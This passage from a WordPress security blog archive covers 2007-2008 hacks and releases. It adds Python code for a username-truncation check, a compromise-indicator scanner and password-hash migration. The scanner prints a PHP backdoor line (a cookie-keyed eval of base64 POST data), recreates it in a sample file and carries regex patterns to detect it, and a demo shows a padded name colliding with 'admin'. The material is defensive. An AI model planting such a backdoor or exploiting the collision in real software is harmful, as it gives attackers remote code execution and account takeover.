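    """What a non-strict MySQL server actually keeps after INSERT."""
    return value[:width]


def db_equal(a, b):
    """Comparison under a PAD SPACE, case-insensitive collation (assumed
    to match a typical utf8_general_ci wp_users table): trailing spaces
    are ignored and case does not matter."""
    return a.rstrip(" ").lower() == b.rstrip(" ").lower()


def naive_is_unique(candidate, existing_logins):
    """The weak check: exact string comparison on the submitted value,
    done before the database has truncated it."""
    return candidate not in existing_logins


def username_is_acceptable(candidate, existing_logins, width=USER_LOGIN_WIDTH):
    """Hardened check. Returns (ok, reason).

    Rejects names the database would alter before storing (padding or
    over-length) and compares the stored form the way the database will.
    """
    if candidate != candidate.strip():
        return False, "leading or trailing whitespace"
    if len(candidate) > width:
        return False, "longer than the user_login column"
    stored = as_stored(candidate, width)
    for other in existing_logins:
        if db_equal(stored, other):
            return False, "collides with existing login %r" % other
    return True, "ok"


if __name__ == "__main__":
    existing = ["admin"]
    padded = "admin".ljust(USER_LOGIN_WIDTH) + "x"  # 61 chars, stored as "admin" + spaces
    print("naive check accepts padded name:", naive_is_unique(padded, existing))
    print("stored form equals 'admin' in the DB:", db_equal(as_stored(padded), "admin"))
    print("hardened check:", username_is_acceptable(padded, existing))
```

The point is the order of operations: validate and compare on the value the database will store, not on the raw form field, and let the database itself enforce the width (a strict sql_mode turns truncation into an error instead of a warning).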


WordPress Plugin: WordPress Exploit Scanner

June 27, 2008 | No Comments Yet

With all the talk about WordPress security vulnerabilities, every bit of protection helps. The WordPress Exploit Scanner plugin does just what it says: it looks for any suspicious behavior in your WordPress files and database tables.

This WordPress plugin searches the files on your site for a few known strings sometimes used by hackers, and lists them with code fragments taken from the files. It also makes a few checks of the database, looking at the active_plugins blog option, the comments table, and the posts table.

It also allows the blog owner to search for whatever string they like which could come in handy when new exploit code is used in a hack.

Download WordPress Exploit Scanner


More WordPress blogs being hacked

June 18, 2008 | No Comments Yet

Last time, it was a WordPress vulnerability that was resolved by upgrading to the latest version. This time, it’s a non-WordPress issue, specifically a redirect technique, that’s affecting a lot of WordPress-powered blogs.

The recent security issues concern hackers who work with Google and other search engine results and redirect traffic from your blog or website. The searcher clicks on the link and is redirected to the hacker’s site with the same search string used to search in the search engine. Most bloggers notice a problem when their site traffic drops inexplicably and/or their ad income drops.

Read Lorelle’s post for more information on detecting and eliminating this security issue.


WordPress 2.5.1 Released, But You Can’t Reset Passwords and 2.5.2 is Close Behind; Will You Update?

April 28, 2008 | 1 Comment

Just as Filipino bloggers trooped to U.P. Diliman for the 4th iBlog Summit, WordPress 2.5.1 was released. It has over 70 security fixes and enhancements, including a SECRET_KEY in the wp-config.php file explained in-depth by Ryan Boren.

Now it seems people are debating whether one should hold off for the next WordPress version for several reasons. First, there’s a bug that can potentially lock people out of their blogs should they wish to reset their passwords. This can be fixed by manually editing the password through phpMyAdmin, and there’s a patch for the WordPress update itself.

Second, there’s talk that WordPress 2.5.2 will soon be out. This could frustrate a lot of bloggers who aren’t really comfortable with updating WordPress.

So will you upgrade to 2.5.1 immediately, or wait until 2.5.2 comes out? I’d say it has a lot to do with how confident you are in the blog security of your current installation.


Has Your WordPress Been Hacked Recently?

April 16, 2008 | 34 Comments

Matt Mullenweg’s recent post about a “bogus” WordPress security breach had me wondering about my own WordPress sites. Unfortunately, it turns out I’ve become a victim of a WordPress vulnerability whose symptoms are detailed here. Took me two whole nights of restoring my files and folders to their pristine condition. (Fingers crossed.) Take note that this is different from the ro8kfbsmag.txt hack, and seems to be a fairly recent attack. Thankfully, there are a lot of tell-tale signs:

Extra code added to the first line of PHP files

<?php if(md5($_COOKIE['_wp_debugger'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){ eval(base64_decode($_POST['file'])); exit; } ?>

Note that the letters and numbers vary.

Solution: open the infected file and delete that code. I recommend using an FTP client like FileZilla, which when coupled with a text editor lets you edit a file then reflect these changes on the server very quickly.

New files ending in _new, _old, .pngg, .jpgg, .giff appearing inside writable directories

See if there are any files in writable directories that have the same name as an existing file with the extensions _new.php, _old.php, .php.pngg, .php.jpgg, or .php.giff. These files will be executables that when called from a browser will display a fake “404 Not Found” error, but if called from a script with the matching hash from one of the hacked PHP scripts, will display system info about the server your site is sitting on.

Solution: delete the files.

New files named wp-info.txt which contain database usernames and passwords

This file will contain userinfo dumped from the MySQL database… usernames, emails, passwords, everything. Move it ASAP, but check your logs to see if it was accessed already.

Solution: delete the file and change all your passwords! Aside from your own, your visitors’ emails and passwords are also there, and somebody else is exploiting that information already.

New “WordPress” user in database (hidden in the admin panel users page)

One other thing I noticed, and this happened on the new 2.5 installs as well as the older ones that hadn’t been upgraded yet, was the silent addition of the user “WordPress”, with no info save a password, and an add date of all zeroes. There’s also no indication of user level in the database, and the user doesn’t show up in the User menu. However, when I was going through and deleting unnecessary “admin” logins, “WordPress” came up as one of the user options to reassign posts to… otherwise it might have been a while before I’d found that buried in the database.

Solution: delete the user. You need to access your database through phpMyAdmin or something similar.

WordPress version changed to 2.5

I’m logged into a site I know is still running 2.1.3, but the footer in the admin panels says 2.5 now.

Solution: upgrade to WordPress 2.5. Keeping your installation up-to-date eliminates old vulnerabilities.

More signs

The file creation and modification seemed to take place on April 11. For me it was the 12th. That’s surprisingly recent.

Also, you might get a lot of suspicious error messages in your logs, dating as far back as last year.

More Solutions

When it comes to security, there are a lot of possible culprits but in this particular situation, we can only be thankful there are a lot of indicative factors and fairly easy ways to resolve the problem. I cannot emphasize how important it is to upgrade immediately. Is it better to have non-working themes and plugins than an insecure site? I would think not.

However, one has to wonder how upgrading to WordPress 2.5 can fix the problem. Remember that when upgrading you are advised to delete the old files first then upload the new files. If you just upload and overwrite the old files, the new files such as the _new, _old, .pngg, .jpgg, .giff ones will remain on the server. Removing them one by one by going through each folder on your website will definitely be painful!

Also take a look at your file and folder permissions. We usually have to CHMOD our uploads, themes, and plugins folders so that we can edit them in the administration panel, but they also make for a hacker’s point of entry.

I believe the most crucial problem here is the wp-info.txt files. The other penetrations could have been used for adding spam comments and links only, but having access to people’s passwords is far worse, especially when it includes your own readers.

Update (April 17): There’s now a WordPress Codex page for this issue.

Update (May 2): Please continue to visit the WordPress Support forum for any new developments on this hack. There are other symptoms popping up, like unwanted plugins activated in the database (see active_plugins and deactivated_plugins under wp_options).

Update (June 10): Check out this very helpful post by Donncha O Caoimh.
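Going through each folder by hand is painful, as noted above, so here is an added example of a small scanner that checks for the tell-tale signs listed in this post (the first-line backdoor keyed on a cookie, the _new/_old/.pngg/.jpgg/.giff companion files, the wp-info.txt dumps, the hidden “WordPress” user) and also does the kind of active_plugins check the WordPress Exploit Scanner post above describes. This is my own code, not the plugin’s and not anything from the Codex page; the sample site tree, the option value and the user rows it runs on are constructed for the demonstration, and the `scan_tree`, `unexpected_active_plugins` and `suspicious_users` names are mine.

```python
"""Indicator scan for the April 2008 WordPress hack (added example)."""
import os
import re
import tempfile

# Marker structure quoted in the post: md5() of a cookie compared to a fixed
# 32-hex digest, then eval(base64_decode($_POST[...])). The digest changes
# per infection, so match the shape rather than one hash.
BACKDOOR_RE = re.compile(
    r"md5\(\s*\$_COOKIE\[[^\]]*\]\s*\)\s*==\s*\"[0-9a-f]{32}\""
    r"|eval\s*\(\s*base64_decode\s*\(\s*\$_POST\[",
    re.IGNORECASE,
)
# Companion-file names and the credential dump named in the post.
SUSPICIOUS_SUFFIXES = ("_new.php", "_old.php", ".php.pngg", ".php.jpgg", ".php.giff")
DUMP_FILENAME = "wp-info.txt"
# PHP-serialized strings look like s:LEN:"value"; enough to list the plugin
# paths inside the active_plugins option without a full unserializer.
SERIALIZED_STR_RE = re.compile(r's:\d+:"([^"]*)"')


def scan_tree(root):
    """Walk an install and return sorted (indicator, path) tuples."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name == DUMP_FILENAME:
                findings.append(("credential-dump", path))
            if name.endswith(SUSPICIOUS_SUFFIXES):
                findings.append(("companion-file", path))
            if name.endswith(".php"):
                # The post reports the first line, but scan the whole file:
                # a copy lower down is just as dangerous.
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    if BACKDOOR_RE.search(fh.read()):
                        findings.append(("injected-backdoor", path))
    return sorted(findings)


def unexpected_active_plugins(option_value, allowlist):
    """Plugin entries in a serialized active_plugins value not on the allowlist."""
    return sorted(e for e in SERIALIZED_STR_RE.findall(option_value) if e not in allowlist)


def suspicious_users(rows):
    """wp_users rows (dicts) matching the hidden account the post describes:
    login 'WordPress' or an all-zero registration date."""
    return [r["user_login"] for r in rows
            if r["user_login"] == "WordPress"
            or r.get("user_registered", "").startswith("0000-00-00")]


def build_sample_site():
    """Constructed sample tree: one clean file plus one of each file indicator.
    The backdoor line uses a placeholder digest, not a real one."""
    root = tempfile.mkdtemp(prefix="wp-sample-")

    def put(rel, content):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)

    put("index.php", "<?php\nrequire('./wp-blog-header.php');\n")
    put("wp-login.php",
        "<?php if(md5($_COOKIE['_wp_debugger'])==\"0123456789abcdef0123456789abcdef\")"
        "{ eval(base64_decode($_POST['file'])); exit; } ?>\n<?php // original code\n")
    put("wp-content/uploads/wp-login_old.php", "<?php // companion file\n")
    put("wp-content/uploads/wp-info.txt", "constructed placeholder dump\n")
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for kind, path in scan_tree(site):
        print(kind, path)
    print(unexpected_active_plugins(
        'a:2:{i:0;s:19:"akismet/akismet.php";i:1;s:19:"hidden/backdoor.php";}',
        {"akismet/akismet.php"}))
```

Run it against a copy of your document root and the SELECT output of wp_users and the active_plugins row from wp_options. A hit on “injected-backdoor” means the file has to be replaced from a clean download, not just cleaned, since you cannot tell what else was changed; and as the post says, finding wp-info.txt means every password in that table is burned regardless of whether the file still looks intact.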


Technorati’s Ultimatum: Upgrade WordPress to 2.5 Now or Your Blog Will NOT Be Indexed

April 8, 2008 | 7 Comments

Now this comes as a surprise. Technorati has actually given an ultimatum to vulnerable WordPress blogs, saying that unless they upgrade to the latest, most secure version, 2.5, they will not be indexed.

Blogs that have been compromised by this security vulnerability are typified by having links to spam destinations inserted onto the blog page. These link insertions may be invisible to casual observations; the links are often obscured by style attributes that render them invisible. These links are still seen by crawlers such as Technorati’s, Google’s and Yahoo’s.

Technorati also mentions that blogs hosted on WordPress.com should not have this vulnerability.

I know Filipino bloggers are big fans of Technorati, so here’s yet another reason for you to upgrade to WordPress 2.5. Don’t worry, it’s not scary at all!


WordPress 2.5’s New Password Hashing Scheme

March 28, 2008 | 1 Comment

Ryan Boren tells us there’s a new password hashing scheme in WordPress 2.5 (along with a new format for cookie authentication). Why is this important for WordPress users with little knowledge about security?

If you share your users table with other applications or with other WordPress blogs that won’t be upgrading to 2.5 all at once, you’ll probably want to continue using MD5 hashes rather than the new hashes.

Thankfully there’s a WordPress plugin that allows us to continue using MD5 hashes. He strongly recommends us to install and run it once we upgrade to 2.5.

Users that login prior to installation of the plugin will get the new hashes, but after the plugin is active those users will be moved back to MD5 upon their next log in. If you ever want to move to the new hashes, just deactivate the plugin.
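To show what “moved back to MD5 upon their next log in” means mechanically, here is an added example of a login check that accepts both hash formats in one users table and rewrites the stored hash in whichever direction is wanted. It is my own code, not WordPress’s and not the plugin’s: WordPress 2.5 uses the phpass portable format (hashes starting with $P$) for the new scheme, and this sketch substitutes PBKDF2-HMAC-SHA256 under a made-up $pbkdf2$ prefix as a stand-in, which is an assumption for illustration only. The `check_password`, `login` and `keep_md5` names are mine.

```python
"""Dual-format password verification with migrate-on-login (added example).

Legacy records are plain 32-hex MD5 (no salt). "New" records use a
PBKDF2 stand-in, NOT the phpass $P$ format WordPress 2.5 actually uses.
"""
import hashlib
import hmac
import os
import re

MD5_HEX_RE = re.compile(r"^[0-9a-f]{32}$")
PBKDF2_ROUNDS = 100_000


def md5_hash(password):
    """Legacy WordPress-style hash: unsalted MD5 of the password."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def new_hash(password, salt=None):
    """Stand-in for the new scheme; salt parameter exists for testing."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return "$pbkdf2$%d$%s$%s" % (PBKDF2_ROUNDS, salt.hex(), dk.hex())


def is_legacy(stored):
    """A stored value that is exactly 32 hex digits is an old MD5 hash."""
    return bool(MD5_HEX_RE.match(stored))


def check_password(password, stored):
    """Verify against whichever format the row holds, in constant time."""
    if is_legacy(stored):
        return hmac.compare_digest(md5_hash(password), stored)
    try:
        _, scheme, rounds, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if scheme != "pbkdf2":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)


def login(password, stored, keep_md5=False):
    """Return (ok, hash_to_store).

    With keep_md5=False (plain 2.5 behaviour) a legacy row is upgraded on a
    successful login; with keep_md5=True (what the compatibility plugin
    does) a new-format row is moved back to MD5 so other applications
    sharing the table keep working. Only a correct password can trigger a
    rewrite, because only then is the plaintext available to rehash.
    """
    if not check_password(password, stored):
        return False, stored
    if keep_md5 and not is_legacy(stored):
        return True, md5_hash(password)
    if not keep_md5 and is_legacy(stored):
        return True, new_hash(password)
    return True, stored


if __name__ == "__main__":
    row = md5_hash("correct horse")          # what an un-upgraded user has
    ok, row = login("correct horse", row)    # upgraded on first login
    print(ok, row[:8])
    ok, row = login("correct horse", row, keep_md5=True)  # plugin active
    print(ok, is_legacy(row))
```

The trade-off the post glosses over: unsalted MD5 is the weak end of this arrangement, so keeping it is a compatibility decision, not a security one, and the sooner every application on that shared table can read the stronger format, the sooner the plugin can be deactivated.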


Update to WordPress 2.3.3 Now!

February 5, 2008 | 1 Comment

Two months after the last upgrade, WordPress 2.3.3 is an urgent security release. It addresses an XML-RPC vulnerability that allows any user to edit any other user’s posts in the same blog, as well as some other bug fixes.

Now if updating seems too much of a chore right now and you only care about keeping your blog secure, get the updated xmlrpc.php file and you’re good to go.

Check out the whole announcement at the official WordPress blog.


WordPress 2.3.1

November 22, 2007 | No Comments Yet

The latest stable release of WordPress as of this writing is 2.3.1. Changes from the previous version were mostly security and bug fixes.

Please head on to the official WordPress site to download.
